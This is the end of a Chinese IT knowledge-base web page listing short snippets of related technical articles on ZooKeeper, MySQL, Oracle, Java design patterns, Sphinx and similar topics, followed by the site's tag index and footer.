      // this stage will be assigned to &quot;default&quot; po</div>
                                </li>
                                <li><a href="/article/1775.htm"
                                       title="ZooKeeper 入门" target="_blank">ZooKeeper 入门</a>
                                    <span class="text-muted">BlueSkator</span>
<a class="tag" taget="_blank" href="/search/%E4%B8%AD%E9%97%B4%E4%BB%B6/1.htm">中间件</a><a class="tag" taget="_blank" href="/search/zk/1.htm">zk</a>
                                    <div>ZooKeeper是一个高可用的分布式数据管理与系统协调框架。基于对Paxos算法的实现,使该框架保证了分布式环境中数据的强一致性,也正是基于这样的特性,使得ZooKeeper解决很多分布式问题。网上对ZK的应用场景也有不少介绍,本文将结合作者身边的项目例子,系统地对ZK的应用场景进行一个分门归类的介绍。 
值得注意的是,ZK并非天生就是为这些应用场景设计的,都是后来众多开发者根据其框架的特性,利</div>
                                </li>
                                <li><a href="/article/1902.htm"
                                       title="MySQL取得当前时间的函数是什么 格式化日期的函数是什么" target="_blank">MySQL取得当前时间的函数是什么 格式化日期的函数是什么</a>
                                    <span class="text-muted">BreakingBad</span>
<a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/Date/1.htm">Date</a>
                                    <div>取得当前时间用 now() 就行。
在数据库中格式化时间 用DATE_FORMA T(date, format) .
根据格式串format 格式化日期或日期和时间值date,返回结果串。

  可用DATE_FORMAT( ) 来格式化DATE 或DATETIME 值,以便得到所希望的格式。根据format字符串格式化date值:

  %S, %s 两位数字形式的秒( 00,01,</div>
                                </li>
                                <li><a href="/article/2029.htm"
                                       title="读《研磨设计模式》-代码笔记-组合模式" target="_blank">读《研磨设计模式》-代码笔记-组合模式</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a>
                                    <div>声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ 
 
 



import java.util.ArrayList;
import java.util.List;

abstract class Component {
	
	public abstract void printStruct(Str</div>
                                </li>
                                <li><a href="/article/2156.htm"
                                       title="4_JAVA+Oracle面试题(有答案)" target="_blank">4_JAVA+Oracle面试题(有答案)</a>
                                    <span class="text-muted">chenke</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a>
                                    <div>基础测试题 
 卷面上不能出现任何的涂写文字,所有的答案要求写在答题纸上,考卷不得带走。 
选择题 
1、 What will happen when you attempt to compile and run the following code? (3) 
public class Static { 
 static { 
 int x = 5; // 在static内有效 
 } 
 st</div>
                                </li>
                                <li><a href="/article/2283.htm"
                                       title="新一代工作流系统设计目标" target="_blank">新一代工作流系统设计目标</a>
                                    <span class="text-muted">comsci</span>
<a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/%E8%84%9A%E6%9C%AC/1.htm">脚本</a>
                                    <div> 
&nbsp; 用户只需要给工作流系统制定若干个需求,流程系统根据需求,并结合事先输入的组织机构和权限结构,调用若干算法,在流程展示版面上面显示出系统自动生成的流程图,然后由用户根据实际情况对该流程图进行微调,直到满意为止,流程在运行过程中,系统和用户可以根据情况对流程进行实时的调整,包括拓扑结构的调整,权限的调整,内置脚本的调整。。。。。 
 
 在这个设计中,最难的地方是系统根据什么来生成流</div>
                                </li>
                                <li><a href="/article/2410.htm"
                                       title="oracle 行链接与行迁移" target="_blank">oracle 行链接与行迁移</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/%E8%A1%8C%E8%BF%81%E7%A7%BB/1.htm">行迁移</a>
                                    <div>表里的一行对于一个数据块太大的情况有二种(一行在一个数据块里放不下) 
 
第一种情况: 
INSERT的时候,INSERT时候行的大小就超一个块的大小。Oracle把这行的数据存储在一连串的数据块里(Oracle Stores the data for the row in a chain of data blocks),这种情况称为行链接(Row Chain),一般不可避免(除非使用更大的数据</div>
                                </li>
                                <li><a href="/article/2537.htm"
                                       title="[JShop]开源电子商务系统jshop的系统缓存实现" target="_blank">[JShop]开源电子商务系统jshop的系统缓存实现</a>
                                    <span class="text-muted">dinguangx</span>
<a class="tag" taget="_blank" href="/search/jshop/1.htm">jshop</a><a class="tag" taget="_blank" href="/search/%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1/1.htm">电子商务</a>
                                    <div>前言 
jeeshop中通过SystemManager管理了大量的缓存数据,来提升系统的性能,但这些缓存数据全部都是存放于内存中的,无法满足特定场景的数据更新(如集群环境)。JShop对jeeshop的缓存机制进行了扩展,提供CacheProvider来辅助SystemManager管理这些缓存数据,通过CacheProvider,可以把缓存存放在内存,ehcache,redis,memcache</div>
                                </li>
                                <li><a href="/article/2664.htm"
                                       title="初三全学年难记忆单词" target="_blank">初三全学年难记忆单词</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/english/1.htm">english</a><a class="tag" taget="_blank" href="/search/word/1.htm">word</a>
                                    <div>several 儿子;若干 
shelf 架子 
knowledge 知识;学问 
librarian 图书管理员 
abroad 到国外,在国外 
surf 冲浪 
wave 浪;波浪 
twice 两次;两倍 
describe 描写;叙述 
especially 特别;尤其 
attract 吸引 
prize 奖品;奖赏 
competition 比赛;竞争 
event 大事;事件 
O</div>
                                </li>
                                <li><a href="/article/2791.htm"
                                       title="sphinx实践" target="_blank">sphinx实践</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/sphinx/1.htm">sphinx</a>
                                    <div>&nbsp; 
安装参考地址:http://briansnelson.com/How_to_install_Sphinx_on_Centos_Server 
&nbsp; 
yum install sphinx 
如果失败的话使用下面的方式安装 
wget http://sphinxsearch.com/files/sphinx-2.2.9-1.rhel6.x86_64.rpm 
yum loca</div>
                                </li>
                                <li><a href="/article/2918.htm"
                                       title="JPA之JPQL(三)" target="_blank">JPA之JPQL(三)</a>
                                    <span class="text-muted">frank1234</span>
<a class="tag" taget="_blank" href="/search/orm/1.htm">orm</a><a class="tag" taget="_blank" href="/search/jpa/1.htm">jpa</a><a class="tag" taget="_blank" href="/search/JPQL/1.htm">JPQL</a>
                                    <div>1 什么是JPQL 
JPQL是Java Persistence Query Language的简称,可以看成是JPA中的HQL, JPQL支持各种复杂查询。 
 
2 检索单个对象 
@Test 
public&nbsp; void querySingleObject1() { 
&nbsp;&nbsp;&nbsp; Query query = em.createQuery(&quot;sele</div>
                                </li>
                                <li><a href="/article/3045.htm"
                                       title="Remove Duplicates from Sorted Array II" target="_blank">Remove Duplicates from Sorted Array II</a>
                                    <span class="text-muted">hcx2013</span>
<a class="tag" taget="_blank" href="/search/remove/1.htm">remove</a>
                                    <div>Follow up for &quot;Remove Duplicates&quot;:What if duplicates are allowed at most&nbsp;twice? 
For example,Given sorted array&nbsp;nums&nbsp;=&nbsp;[1,1,1,2,2,3], 
Your function should return length </div>
                                </li>
                                <li><a href="/article/3172.htm"
                                       title="Spring4新特性——Groovy Bean定义DSL" target="_blank">Spring4新特性——Groovy Bean定义DSL</a>
                                    <span class="text-muted">jinnianshilongnian</span>
<a class="tag" taget="_blank" href="/search/spring+4/1.htm">spring 4</a>
                                    <div>Spring4新特性——泛型限定式依赖注入 
Spring4新特性——核心容器的其他改进 
Spring4新特性——Web开发的增强 
Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC&nbsp; 
Spring4新特性——Groovy Bean定义DSL 
Spring4新特性——更好的Java泛型操作API&nbsp; 
Spring4新</div>
                                </li>
                                <li><a href="/article/3299.htm"
                                       title="CentOS安装Mysql5.5" target="_blank">CentOS安装Mysql5.5</a>
                                    <span class="text-muted">liuxingguome</span>
<a class="tag" taget="_blank" href="/search/centos/1.htm">centos</a>
                                    <div>CentOS下以RPM方式安装MySQL5.5 
 
首先卸载系统自带Mysql: 
yum remove mysql mysql-server mysql-libs compat-mysql51 
rm -rf /var/lib/mysql 
rm /etc/my.cnf 
查看是否还有mysql软件: 
rpm -qa|grep mysql 
 
 
 
去http://dev.mysql.c</div>
                                </li>
                                <li><a href="/article/3426.htm"
                                       title="第14章 工具函数(下)" target="_blank">第14章 工具函数(下)</a>
                                    <span class="text-muted">onestopweb</span>
<a class="tag" taget="_blank" href="/search/%E5%87%BD%E6%95%B0/1.htm">函数</a>
                                    <div>index.html 
&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/</div>
                                </li>
                                <li><a href="/article/3553.htm"
                                       title="POJ 1050" target="_blank">POJ 1050</a>
                                    <span class="text-muted">SaraWon</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%8C%E7%BB%B4%E6%95%B0%E7%BB%84/1.htm">二维数组</a><a class="tag" taget="_blank" href="/search/%E5%AD%90%E7%9F%A9%E9%98%B5/1.htm">子矩阵</a><a class="tag" taget="_blank" href="/search/%E6%9C%80%E5%A4%A7%E5%92%8C/1.htm">最大和</a>
                                    <div>POJ ACM第1050题的详细描述,请参照 
http://acm.pku.edu.cn/JudgeOnline/problem?id=1050 
 
题目意思: 
给定包含有正负整型的二维数组,找出所有子矩阵的和的最大值。 
如二维数组 
0 -2 -7 0 
9 2 -6 2 
-4 1 -4 1 
-1 8 0 -2 
中和最大的子矩阵是 
9 2 
-4 1 
-1 8 
且最大和是15</div>
                                </li>
                                <li><a href="/article/3680.htm"
                                       title="[5]设计模式——单例模式" target="_blank">[5]设计模式——单例模式</a>
                                    <span class="text-muted">tsface</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E4%BE%8B/1.htm">单例</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/%E8%99%9A%E6%8B%9F%E6%9C%BA/1.htm">虚拟机</a>
                                    <div>单例模式:保证一个类仅有一个实例,并提供一个访问它的全局访问点 
&nbsp; 
安全的单例模式: 
&nbsp; 
&nbsp; 
/*
 * @(#)Singleton.java  2014-8-1
 *
 * Copyright 2014 XXXX, Inc. All rights reserved.
 */
package com.fiberhome.singleton;

</div>
                                </li>
                                <li><a href="/article/3807.htm"
                                       title="Java8全新打造,英语学习supertool" target="_blank">Java8全新打造,英语学习supertool</a>
                                    <span class="text-muted">yangshangchuan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/superword/1.htm">superword</a><a class="tag" taget="_blank" href="/search/%E9%97%AD%E5%8C%85/1.htm">闭包</a><a class="tag" taget="_blank" href="/search/java8/1.htm">java8</a><a class="tag" taget="_blank" href="/search/%E5%87%BD%E6%95%B0%E5%BC%8F%E7%BC%96%E7%A8%8B/1.htm">函数式编程</a>
                                    <div>superword是一个Java实现的英文单词分析软件,主要研究英语单词音近形似转化规律、前缀后缀规律、词之间的相似性规律等等。Clean code、Fluent style、Java8 feature: Lambdas, Streams and Functional-style Programming。 
&nbsp; 
升学考试、工作求职、充电提高,都少不了英语的身影,英语对我们来说实在太重要</div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类:</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>